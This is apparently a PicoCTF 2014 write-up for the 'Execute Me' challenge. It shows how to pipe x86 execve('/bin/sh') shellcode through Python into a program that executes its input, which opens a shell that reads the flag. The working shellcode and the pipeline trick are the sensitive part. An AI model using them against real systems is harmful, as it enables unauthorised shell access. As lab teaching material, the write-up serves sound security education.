PicoCTF 2014 Write-ups

Execute Me - 80 (Binary Exploitation)

Writeup by Oksisane

Created: 2014-11-09 13:07:47

Last modified: 2014-11-17 20:58:07


This program will run whatever you send to it! Try to get the flag! The binary can be found at /home/execute/ on the shell server. The source can be found here.


You can get the flag in a number of ways, but the easiest would be to run a shell.



Use the program to execute some shellcode.


Let's start by running the program on the server. When we run it and enter /bin/sh the following appears:

[email protected]:~$ cd /home/execute/
[email protected]:/home/execute$ ./execute
Segmentation fault (core dumped)
[email protected]:/home/execute$

Huh, that's not good. Looking a little closer at the code we see this:

read(0, buf, 128);

So the program reads in our buffer and executes it. However, it is not executing the buffer as we would expect, with the system() command to run a command in the shell. Instead, it is executing the assembly commands that we put in the buffer. The hint tells us to run a shell, so we should use shellcode. Shellcode typically is in the form of a bunch of hex values that can be executed to perform a function such as running cat or /bin/sh. Many websites provide shellcode, such as shell-storm. For now, let's use this shellcode to run execve("/bin/sh")

[email protected]:/home/execute$ ./execute
Segmentation fault (core dumped)
[email protected]:/home/execute$

Huh, that still didn't work. Our next task is to pipe the hex values into the program instead of type them in. Right now, the program interprets \x31as 4 separate ascii values instead of ascii value 0x31 (or 49 in base 10). To do this we can use Python:

[email protected]:/home/execute$ (python -c "print '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'") | ./execute
[email protected]:/home/execute$

This uses Python to print our hex characters into the program. Note the use of a " to encapsulate the Python code and the ' to encapsulate the print command. This time, we get no error but still no shell! The shell is successfully running with this shellcode but is exiting before we can input anything into it. The final step here is to add a cat to the end of our Python command, which prevents this.

[email protected]:/home/execute$ (python -c "print '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'"; cat) | ./execute
cat flag.txt

Our shell runs successfully and we get our flag!